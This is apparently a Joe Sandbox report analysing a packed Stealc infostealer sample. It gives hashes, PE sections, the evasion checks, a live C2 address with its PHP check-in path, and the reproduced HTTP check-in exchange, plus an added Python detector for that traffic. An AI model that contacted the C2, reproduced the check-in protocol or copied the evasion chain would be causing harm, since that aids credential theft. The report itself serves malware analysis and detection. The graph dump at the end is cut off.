                Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 1 Account Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 3 Obfuscated Files or Information | Cached Domain Credentials | 1 System Owner/User Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 12 Software Packing | DCSync | 1 File and Directory Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 DLL Side-Loading | Proc Filesystem | 324 System Information Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                          Source | Detection | Scanner | Label
                          file.exe | 100% | Avira | TR/Crypt.TPM.Gen
                          file.exe | 100% | Joe Sandbox ML |
                          No Antivirus matches
                          No Antivirus matches
                          No Antivirus matches
                          Source | Detection | Scanner | Label
                          http://185.215.113.37/ | 100% | URL Reputation | malware
                          http://185.215.113.37 | 100% | URL Reputation | malware
                          http://185.215.113.37/e2b1563c6670f193.php | 100% | URL Reputation | malware
                          http://185.215.113.37/ws | 100% | URL Reputation | malware
                No contacted domains info
                          Name | Malicious | Antivirus Detection | Reputation
                          http://185.215.113.37/ | true | URL Reputation: malware | unknown
                          http://185.215.113.37/e2b1563c6670f193.php | true | URL Reputation: malware | unknown
                          Name | Source | Malicious | Antivirus Detection | Reputation
                          http://185.215.113.37/-zx3 | file.exe, 00000000.00000002.2075749076.00000000013E8000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                          http://185.215.113.37o | file.exe, 00000000.00000002.2075749076.000000000138E000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                          http://185.215.113.37/e2b1563c6670f193.phpWCG3 | file.exe, 00000000.00000002.2075749076.00000000013E8000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                          http://185.215.113.37 | file.exe, 00000000.00000002.2075749076.000000000138E000.00000004.00000020.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
                          http://185.215.113.37/e2b1563c6670f193.php;Cc3 | file.exe, 00000000.00000002.2075749076.00000000013E8000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                          http://185.215.113.37/z% | file.exe, 00000000.00000002.2075749076.00000000013D2000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                          http://185.215.113.37/ws | file.exe, 00000000.00000002.2075749076.00000000013E8000.00000004.00000020.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
                          IP | Domain | Country | ASN | ASN Name | Malicious
                          185.215.113.37 | unknown | Portugal | 206894 | WHOLESALECONNECTIONSNL | true
                          Joe Sandbox version: 41.0.0 Charoite
                          Analysis ID: 1538205
                          Start date and time: 2024-10-20 20:13:05 +02:00
                          Joe Sandbox product: CloudBasic
                          Overall analysis duration: 0h 2m 46s
                          Hypervisor based Inspection enabled: false
                          Report type: full
                          Cookbook file name: default.jbs
                          Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of new started processes analysed: 2
                          Number of new started drivers analysed: 0
                          Number of existing processes analysed: 0
                          Number of existing drivers analysed: 0
                          Number of injected processes analysed: 0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode: default
                          Analysis stop reason: Timeout
                          Sample name: file.exe
                          Detection: MAL
                          Classification: mal100.troj.evad.winEXE@1/0@0/1
                          EGA Information:
                          • Successful, ratio: 100%
                          HCA Information:
                          • Successful, ratio: 80%
                          • Number of executed functions: 19
                          • Number of non-executed functions: 85
                          Cookbook Comments:
                          • Found application associated with file extension: .exe
                          • Stop behavior analysis, all processes terminated
                          • Exclude process from analysis (whitelisted): dllhost.exe
                          • VT rate limit hit for: file.exe
                          No simulations
                          Match | Associated Sample Name / URL | Detection | Threat Name | Context
                          185.215.113.37 | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
                          185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
                          185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
                          185.215.113.37 | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
                          185.215.113.37 | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 185.215.113.37/e2b1563c6670f193.php
                          185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
                          185.215.113.37 | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
                          185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
                          185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
                          185.215.113.37 | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
                          No context
                          Match | Associated Sample Name / URL | Detection | Threat Name | Context
                          WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc, Vidar | 185.215.113.37
                          WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
                          WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
                          WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc, Vidar | 185.215.113.37
                          WHOLESALECONNECTIONSNL | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 185.215.113.16
                          WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
                          WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc, Vidar | 185.215.113.37
                          WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
                          WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
                          WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc, Vidar | 185.215.113.37
                          No context
                          No context
                          No created / dropped files found
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.948679847936417
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: file.exe
File size: 1'818'624 bytes
MD5: ffe1a72c9e5e3aa49aaba14b27f0e4ad
SHA1: ec14b0a1a2d5ed374394f41667084bb1c48307c1
SHA256: 315bf34c13238a2fa2f083ecd2bd6f440674ba5b8b5db199c1b35c9724e0e4bb
SHA512: 19b20de29267244f14aa3d3e836b22d85c41a15a9131cf20f1b179042b3ca0a77d831e40da8c6f34fceee9fe67fc5179b1decfe0a1a28dfed02079dc3a784c8e
SSDEEP: 49152:b5VdfxYow/QaL88AVFIffYqr3eAsuTZY7:b5bxYh88ASfAqzNsaZM
TLSH: 8E8533136F3253E8E56C907C1499AC4AB7348E989B9C37F5FB058273D99F688D762203
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........
Icon Hash: 00928e8e8686b000
Entrypoint: 0xa8b000
Entrypoint Section: .taggant
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp: 0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 1
File Version Major: 5
File Version Minor: 1
Subsystem Version Major: 5
Subsystem Version Minor: 1
Import Hash: 2eabe9054cad5152567f0699947a2c5b
Entrypoint preview (disassembly starting at 0xa8b000, inside .taggant). After the initial jmp the bytes are almost all zero, which the disassembler renders as add byte ptr [eax], al:
                          jmp 00007F0BF881510Ah
                          setle byte ptr [ebx]
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add cl, ch
                          add byte ptr [eax], ah
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], cl
                          add byte ptr [eax], 00000000h
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          adc byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add ecx, dword ptr [edx]
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          xor byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], 00000000h
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [ebx], al
                          or al, byte ptr [eax]
                          add byte ptr [esi], al
                          or al, byte ptr [eax]
                          add byte ptr [edx], al
                          or al, byte ptr [eax]
                          add byte ptr [edx+ecx], al
                          add byte ptr [eax], al
                          add dword ptr [edx], ecx
                          add byte ptr [eax], al
                          or ecx, dword ptr [edx]
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          Programming Language:
                          • [C++] VS2010 build 30319
                          • [ASM] VS2010 build 30319
                          • [ C ] VS2010 build 30319
                          • [ C ] VS2008 SP1 build 30729
                          • [IMP] VS2008 SP1 build 30729
                          • [LNK] VS2010 build 30319
Data directories:
Name                                 | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT         | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_IMPORT         | 0x25d050        | 0x64         | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE       | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_EXCEPTION      | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_SECURITY       | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_BASERELOC      | 0x25d1f8        | 0x8          | .idata
IMAGE_DIRECTORY_ENTRY_DEBUG          | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT      | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR      | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_TLS            | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG    | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT   | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_IAT            | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT   | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_RESERVED       | 0x0             | 0x0          |
Only the import and base-relocation directories are populated, both inside .idata. The relocation directory is 8 bytes, the size of a single IMAGE_BASE_RELOCATION header with no entries, yet DYNAMIC_BASE is set and the process table below shows the image loaded at 0x680000 rather than the preferred 0x400000: whatever runs from the entry point has to cope with the rebase itself. There is no security (Authenticode), debug, TLS or load-config directory.
Sections:
Name      | Virtual Address | Virtual Size | Raw Size | MD5                              | Xored PE | ZLIB Complexity     | File Type            | Entropy            | Characteristics
(unnamed) | 0x1000          | 0x25b000     | 0x22800  | 2b2b0f3272a39a005b96cca98930b581 | unknown  | unknown             | unknown              | unknown            | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc     | 0x25c000        | 0x1000       | 0x0      | d41d8cd98f00b204e9800998ecf8427e | False    | 0                   | empty                | 0.0                | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata    | 0x25d000        | 0x1000       | 0x200    | c60c4959cc8d384ac402730cc6842bb0 | False    | 0.1328125           | data                 | 0.9064079259880791 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
(unnamed) | 0x25e000        | 0x296000     | 0x200    | 9749b141140719de59347f3dba0551e1 | unknown  | unknown             | unknown              | unknown            | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
atgdqvtb  | 0x4f4000        | 0x196000     | 0x195e00 | d1c27a9a076a57bbe6aace1cac507a12 | False    | 0.9950946306205728  | data                 | 7.954841029285802  | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
eqelhmzu  | 0x68a000        | 0x1000       | 0x400    | dc14894cc7cdacc3f1062be197d39a5c | False    | 0.75                | data                 | 6.168863599859574  | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant  | 0x68b000        | 0x3000       | 0x2200   | fc1776110b40f0c4329d29b45280cf8f | False    | 0.06238511029411765 | DOS executable (COM) | 0.7795115145692763 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Five of the seven sections are mapped readable, writable and executable, two have no name at all, and the entry point (RVA 0x68b000, i.e. 0xa8b000 at the preferred base) lies in .taggant, the last section, which holds only 0x2200 bytes of very low-entropy data. Almost all of the file's bytes sit in atgdqvtb at entropy 7.95, the packed payload that the unpacking signatures at the top of the report refer to. The MD5 reported for .rsrc is the hash of zero bytes, so the resource section is empty on disk; the two unnamed sections together reserve over 5 MB of virtual space backed by only 0x22a00 bytes of file data.
Imports (only one API is declared; everything else is resolved at runtime, see the LoadLibraryA/GetProcAddress chain in the execution graph):
DLL          | Import
kernel32.dll | lstrcpy
Suricata IDS alerts:
Timestamp                       | SID     | Signature                                        | Severity | Source IP   | Source Port | Dest IP        | Dest Port | Protocol
2024-10-20T20:13:57.397393+0200 | 2044243 | ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in | 1        | 192.168.2.5 | 49704       | 185.215.113.37 | 80        | TCP
TCP packets:
Timestamp                            | Source Port | Dest Port | Source IP      | Dest IP
Oct 20, 2024 20:13:55.865483046 CEST | 49704       | 80        | 192.168.2.5    | 185.215.113.37
Oct 20, 2024 20:13:55.870397091 CEST | 80          | 49704     | 185.215.113.37 | 192.168.2.5
Oct 20, 2024 20:13:55.870505095 CEST | 49704       | 80        | 192.168.2.5    | 185.215.113.37
Oct 20, 2024 20:13:55.870619059 CEST | 49704       | 80        | 192.168.2.5    | 185.215.113.37
Oct 20, 2024 20:13:55.875355959 CEST | 80          | 49704     | 185.215.113.37 | 192.168.2.5
Oct 20, 2024 20:13:57.027656078 CEST | 80          | 49704     | 185.215.113.37 | 192.168.2.5
Oct 20, 2024 20:13:57.027831078 CEST | 49704       | 80        | 192.168.2.5    | 185.215.113.37
Oct 20, 2024 20:13:57.044944048 CEST | 49704       | 80        | 192.168.2.5    | 185.215.113.37
Oct 20, 2024 20:13:57.049820900 CEST | 80          | 49704     | 185.215.113.37 | 192.168.2.5
Oct 20, 2024 20:13:57.397214890 CEST | 80          | 49704     | 185.215.113.37 | 192.168.2.5
Oct 20, 2024 20:13:57.397392988 CEST | 49704       | 80        | 192.168.2.5    | 185.215.113.37
Oct 20, 2024 20:14:00.961658001 CEST | 49704       | 80        | 192.168.2.5    | 185.215.113.37
                          • 185.215.113.37
HTTP session:
Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
0          | 192.168.2.5 | 49704       | 185.215.113.37 | 80               | 5644 | C:\Users\user\Desktop\file.exe

Oct 20, 2024 20:13:55.870619059 CEST, 89 bytes, OUT:
GET / HTTP/1.1
Host: 185.215.113.37
Connection: Keep-Alive
Cache-Control: no-cache

Oct 20, 2024 20:13:57.027656078 CEST, 203 bytes, IN:
HTTP/1.1 200 OK
Date: Sun, 20 Oct 2024 18:13:56 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

Oct 20, 2024 20:13:57.044944048 CEST, 412 bytes, OUT:
POST /e2b1563c6670f193.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----IIJEBFCFIJJJEBGDBAKE
Host: 185.215.113.37
Content-Length: 211
Connection: Keep-Alive
Cache-Control: no-cache
Data Raw: 2d 2d 2d 2d 2d 2d 49 49 4a 45 42 46 43 46 49 4a 4a 4a 45 42 47 44 42 41 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 34 34 35 30 34 37 36 44 44 43 31 33 33 33 32 37 34 33 38 36 35 0d 0a 2d 2d 2d 2d 2d 2d 49 49 4a 45 42 46 43 46 49 4a 4a 4a 45 42 47 44 42 41 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 49 49 4a 45 42 46 43 46 49 4a 4a 4a 45 42 47 44 42 41 4b 45 2d 2d 0d 0a
Data Ascii (the 211-byte multipart body, with its CRLFs rendered as line breaks):
------IIJEBFCFIJJJEBGDBAKE
Content-Disposition: form-data; name="hwid"

A4450476DDC13332743865
------IIJEBFCFIJJJEBGDBAKE
Content-Disposition: form-data; name="build"

doma
------IIJEBFCFIJJJEBGDBAKE--

Oct 20, 2024 20:13:57.397214890 CEST, 210 bytes, IN:
HTTP/1.1 200 OK
Date: Sun, 20 Oct 2024 18:13:57 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 8
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Data Raw: 59 6d 78 76 59 32 73 3d
Data Ascii: YmxvY2s= (base64 for "block")

The check-in carries just two form fields, a hardware ID (hwid) and a build tag (build, here "doma"); the path is a 16-hex-character .php name and the multipart boundary is an all-uppercase token. The server's 8-byte reply decodes to the string block, and no further HTTP requests appear in the session before the process exits.
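To turn the exchange above into something a detection pipeline can act on, the following added example (not Joe Sandbox output and not the sample's own code) parses the request, extracts the multipart fields, decodes the base64 reply and flags request/reply pairs with the shape of this check-in: a POST to /<16 hex characters>.php whose multipart body carries hwid and build, answered with a short base64 body. The check-in request and reply bytes are re-typed from the report's raw data; the GET / pair is the first exchange of the same session; the HTML reply used as a negative case is constructed. The path pattern and field names are taken from this one capture and are the author's detection choice, not a published rule.

```python
"""Decode and classify the Stealc check-in exchange shown in the HTTP session.

Added example, not Joe Sandbox output: a minimal HTTP/1.1 request parser, a
multipart/form-data field extractor, a base64 reply decoder and a detector for
the check-in shape seen in the capture. Sample bytes are re-typed from the
report; the HTML reply below is constructed as a negative case.
"""
import base64
import binascii
import re
from typing import Optional

# Path shape seen in the capture (16 hex characters + .php): author's choice, not a published rule.
CHECKIN_PATH = re.compile(rb"^/[0-9a-f]{16}\.php$")


def parse_http_request(raw: bytes):
    """Split one HTTP/1.1 request into (method, path, lowercase-key header dict, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    method, path, _version = lines[0].split(b" ", 2)
    headers = {}
    for line in lines[1:]:
        key, _, value = line.partition(b":")
        headers[key.strip().lower()] = value.strip()
    return method, path, headers, body


def parse_multipart(content_type: bytes, body: bytes) -> dict:
    """Return {field name: value bytes} for a multipart/form-data body."""
    m = re.search(rb"boundary=([^;\s]+)", content_type)
    if not m:
        raise ValueError("Content-Type carries no boundary")
    delimiter = b"--" + m.group(1)           # "--" + boundary starts every part
    fields = {}
    for part in body.split(delimiter)[1:]:
        if part.startswith(b"--"):           # "--boundary--" closes the body
            break
        part_headers, _, value = part.partition(b"\r\n\r\n")
        name = re.search(rb'name="([^"]*)"', part_headers)
        if name:
            fields[name.group(1).decode()] = value[:-2] if value.endswith(b"\r\n") else value
    return fields


def decode_reply(body: bytes) -> Optional[bytes]:
    """Base64-decode the reply; None when the body is empty or not valid base64."""
    body = body.strip()
    if not body:
        return None
    try:
        return base64.b64decode(body, validate=True)
    except (binascii.Error, ValueError):
        return None


def classify_exchange(request: bytes, reply_body: bytes) -> dict:
    """Flag a request/reply pair with the check-in shape and extract its fields."""
    method, path, headers, body = parse_http_request(request)
    fields = {}
    content_type = headers.get(b"content-type", b"")
    if content_type.startswith(b"multipart/form-data"):
        fields = parse_multipart(content_type, body)
    declared = headers.get(b"content-length")
    length_ok = declared is None or int(declared) == len(body)
    is_checkin = (method == b"POST" and CHECKIN_PATH.match(path) is not None
                  and {"hwid", "build"}.issubset(fields) and length_ok)
    return {"checkin": is_checkin, "hwid": fields.get("hwid"), "build": fields.get("build"),
            "reply": decode_reply(reply_body)}


# Re-typed from the report's HTTP session: the POST and the body of its 200 reply.
CHECKIN_REQUEST = (
    b"POST /e2b1563c6670f193.php HTTP/1.1\r\n"
    b"Content-Type: multipart/form-data; boundary=----IIJEBFCFIJJJEBGDBAKE\r\n"
    b"Host: 185.215.113.37\r\n"
    b"Content-Length: 211\r\n"
    b"Connection: Keep-Alive\r\n"
    b"Cache-Control: no-cache\r\n"
    b"\r\n"
    b"------IIJEBFCFIJJJEBGDBAKE\r\n"
    b'Content-Disposition: form-data; name="hwid"\r\n\r\n'
    b"A4450476DDC13332743865\r\n"
    b"------IIJEBFCFIJJJEBGDBAKE\r\n"
    b'Content-Disposition: form-data; name="build"\r\n\r\n'
    b"doma\r\n"
    b"------IIJEBFCFIJJJEBGDBAKE--\r\n"
)
CHECKIN_REPLY_BODY = b"YmxvY2s="

# The first request of the same session (GET / answered with an empty 200).
PROBE_REQUEST = (
    b"GET / HTTP/1.1\r\n"
    b"Host: 185.215.113.37\r\n"
    b"Connection: Keep-Alive\r\n"
    b"Cache-Control: no-cache\r\n"
    b"\r\n"
)
PROBE_REPLY_BODY = b""

if __name__ == "__main__":
    for req, rep in ((PROBE_REQUEST, PROBE_REPLY_BODY), (CHECKIN_REQUEST, CHECKIN_REPLY_BODY)):
        print(classify_exchange(req, rep))
```

The lengths work out exactly as the capture reports them (89 and 412 bytes on the wire, 211 bytes of body), which is why the detector also checks Content-Length against the body it actually received: a truncated or padded body is a sign that the flow was not what the header claimed. The reply for the check-in decodes to block; the GET / pair and a constructed HTML reply are both rejected.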


Target ID: 0
Start time: 14:13:53
Start date: 20/10/2024
Path: C:\Users\user\Desktop\file.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\file.exe"
Imagebase: 0x680000
File size: 1'818'624 bytes
MD5 hash: FFE1A72C9E5E3AA49AABA14B27F0E4AD
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2075749076.000000000138E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
• Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2031125996.0000000005010000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation: low
Has exited: true


Execution Graph
Execution Coverage: 8%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 9.7%
Total number of Nodes: 2000
Total number of Limit Nodes: 24

The graph is drawn interactively on the original page; its raw node/edge dump is not reproduced here. The API call chain it records, in graph order (addresses are in the image as loaded at 0x680000, and the dump is cut off partway through the second string-allocation loop):
• 6969f0 → 682260: dozens of consecutive calls to 6845c0 (RtlAllocateHeap, VirtualProtect); 6826a0, reached later from 695b10, repeats the same pattern.
• 699860 → 699750 (GetPEB) → five LoadLibraryA calls → a chain of GetProcAddress calls: the runtime API resolution that explains the single declared import.
• 696a00 → 69a740 (lstrcpy) → 6811d0, a sequence of checks each with an ExitProcess branch: 68120f; 681160 GetSystemInfo; 681110 GetCurrentProcess + VirtualAllocExNuma; 6810a0 VirtualAlloc / VirtualFree; 6989b0 GlobalMemoryStatusEx followed by __aulldiv; 696770 GetUserDefaultLangID with five separate ExitProcess exits (6967a3, 6967ad, 6967b7, 6967c1, 6967cb); 681190 → 6978e0 (GetProcessHeap, RtlAllocateHeap, GetComputerNameA) and 697850 (GetProcessHeap, RtlAllocateHeap, GetUserNameA) with a further ExitProcess at 6811c4. This is the chain behind the evasion signatures listed at the top of the report.
• 69a9b0 (lstrlen, lstrcpy, lstrcat), 69a8a0 and 69a7a0 (lstrcpy): string assembly, called four times in a row from 696a64.
• 696ac2 OpenEventA: if the event opens, 696af5 CloseHandle + Sleep and loop back to 696a89; otherwise 696ae1 CreateEventA and continue to 696b0c.
• 696920 GetSystemTime → 696820 (string assembly) → sscanf → 69a800 → two SystemTimeToFileTime calls → either ExitProcess at 6969d8 or continuation into 695b10.
• 695b10 onwards: further string assembly (69a820 lstrlen/lstrcpy, 696430, 681590 lstrcpy), 697500 GetWindowsDirectoryA, 684fb0 (GetProcessHeap, RtlAllocateHeap, InternetOpenA) and the routines 684880, 6917a0, 685960 (34 API calls), 691050, 690d90, 690f40, 691a10 and 690740.
14208 6845c0 2 API calls 14207->14208 14209 6835d7 14208->14209 14210 6845c0 2 API calls 14209->14210 14211 6835f0 14210->14211 14212 6845c0 2 API calls 14211->14212 14213 683609 14212->14213 14214 6845c0 2 API calls 14213->14214 14215 683622 14214->14215 14216 6845c0 2 API calls 14215->14216 14217 68363b 14216->14217 14218 6845c0 2 API calls 14217->14218 14219 683654 14218->14219 14220 6845c0 2 API calls 14219->14220 14221 68366d 14220->14221 14222 6845c0 2 API calls 14221->14222 14223 683686 14222->14223 14224 6845c0 2 API calls 14223->14224 14225 68369f 14224->14225 14226 6845c0 2 API calls 14225->14226 14227 6836b8 14226->14227 14228 6845c0 2 API calls 14227->14228 14229 6836d1 14228->14229 14230 6845c0 2 API calls 14229->14230 14231 6836ea 14230->14231 14232 6845c0 2 API calls 14231->14232 14233 683703 14232->14233 14234 6845c0 2 API calls 14233->14234 14235 68371c 14234->14235 14236 6845c0 2 API calls 14235->14236 14237 683735 14236->14237 14238 6845c0 2 API calls 14237->14238 14239 68374e 14238->14239 14240 6845c0 2 API calls 14239->14240 14241 683767 14240->14241 14242 6845c0 2 API calls 14241->14242 14243 683780 14242->14243 14244 6845c0 2 API calls 14243->14244 14245 683799 14244->14245 14246 6845c0 2 API calls 14245->14246 14247 6837b2 14246->14247 14248 6845c0 2 API calls 14247->14248 14249 6837cb 14248->14249 14250 6845c0 2 API calls 14249->14250 14251 6837e4 14250->14251 14252 6845c0 2 API calls 14251->14252 14253 6837fd 14252->14253 14254 6845c0 2 API calls 14253->14254 14255 683816 14254->14255 14256 6845c0 2 API calls 14255->14256 14257 68382f 14256->14257 14258 6845c0 2 API calls 14257->14258 14259 683848 14258->14259 14260 6845c0 2 API calls 14259->14260 14261 683861 14260->14261 14262 6845c0 2 API calls 14261->14262 14263 68387a 14262->14263 14264 6845c0 2 API calls 14263->14264 14265 683893 14264->14265 14266 6845c0 2 API calls 14265->14266 14267 6838ac 14266->14267 14268 6845c0 2 API calls 14267->14268 14269 6838c5 14268->14269 14270 6845c0 2 
